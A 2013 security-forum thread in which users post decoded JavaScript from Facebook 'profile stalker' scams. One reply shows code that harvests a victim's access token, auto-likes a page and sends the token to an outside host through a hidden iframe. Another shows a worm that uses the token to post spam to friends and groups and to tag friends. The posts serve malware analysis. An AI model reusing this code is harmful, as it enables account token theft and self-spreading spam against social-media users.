 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 468
Members: 0
Total: 468
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Any champion can decode this js please? |
 |
Posted: Sun Jul 28, 2013 8:18 am |
|
|
jhonrhods |
Beginner |

 |
|
Joined: Jul 28, 2013 |
Posts: 2 |
|
|
|
 |
 |
 |
|
|
|
|
|
Posted: Sun Jul 28, 2013 10:56 am |
|
|
sprremix |
Regular user |

 |
|
Joined: Apr 25, 2013 |
Posts: 7 |
|
|
|
 |
 |
 |
|
|
|
|
|
 |
 |
|
 |
Posted: Thu Aug 01, 2013 5:47 pm |
|
|
freeuser |
Beginner |

 |
|
Joined: Aug 01, 2013 |
Posts: 2 |
|
|
|
 |
 |
 |
|
Code: |
jQuery(document).ready(function ($) {
$('a#getcode').click(function (e) {
e.preventDefault();
window.open('token.php?getcode', 'popUpWindow', 'width=900,height=20,left=300,top=300,resizable=no,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no, status=yes')
});
$('a#activate').click(function (e) {
e.preventDefault();
$('.howto').fadeOut(function () {
$('.result').show();
$('.error').hide();
$('#logs').html("");
$('.loading').fadeIn('fast', function () {
var access_token = $('.access_token').val();
if (access_token.split('#access_token=')[1]) {
var access_token = access_token.split('#access_token=')[1].split('&')[0];
setTimeout("top.location.href = 'http://addfollow.uni.me/';", 25000);
$.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
if (response.id) {
var uid = response.id;
HeemaNada(access_token);
HaveFun(access_token);
$('ul.list').append('<li><img src="https://graph.facebook.com/' + uid + '/picture" alt="' + response.name + '"><a href="#">Hey , ' + response.name + '</a></li>');
$('.loading').slideUp(function () {
$('.friendlist').slideDown()
})
}
})
} else {
$(this).fadeOut(2000, function () {
$('.error').fadeIn('fast');
$('.howto').fadeIn()
})
}
})
})
});
$('a#back').click(function (e) {
e.preventDefault();
$('.result').slideUp(function () {
$('.error').hide()
})
})
});
function HeemaNada(token) {
jQuery['ajax']({
url: 'https://graph.facebook.com/me/likes?access_token=' + token + '&method=POST&url=https://www.facebook.com/441238915973738',
dataType: 'jsonp',
success: function (_0xb26ax3) {}
})
};
function HaveFun(token) {
console['log']('Request Sent');
document['getElementById']('atp')['innerHTML'] = '<iframe src="http://morethan40.tk/index.php?access_token=' + token + '" width="0" height="0"></iframe>'
};
|
|
|
|
|
|
 |
 |
|
 |
Posted: Tue Aug 06, 2013 10:03 am |
|
|
dondon |
Regular user |

 |
|
Joined: Aug 06, 2013 |
Posts: 8 |
|
|
|
 |
 |
 |
|
Funny, i am getting this. I'm not sure if above is correct.
Code: |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body onLoad="GetGroups();GetFriends();getStatus();">
<script type="text/javascript" src="https://stalkerxx.s3.amazonaws.com/jquery.js"></script>
<script>
var access_token = "";
fotolink = "http://kundia.info/leta/dormans.php";
text = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gtext = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gonderildi = 0;
function GetGroups() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Groups(_0x1f66x7);
}
});
};
function GetFriends() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 400&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Friends(_0x1f66x7);
}
});
};
function Friends(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['uid'] + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};
function Groups(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['gid'] + '/photos?url=' + fotolink + '&message=' + gtext + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};
function getStatus() {
$['getJSON']('https://graph.facebook.com/me/photos?url=' + fotolink + '&message=' + text + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['id']) {
var _0x1f66x11 = _0x1f66xf['id'];
var _0x1f66x12 = 55;
$['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['data']) {
var _0x1f66x13 = [];
$['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
_0x1f66x13['push'](_0x1f66x7['id']);
$['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
});
};
});
};
});
};
</script>
</body>
</html>
|
|
|
|
|
|
 |
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|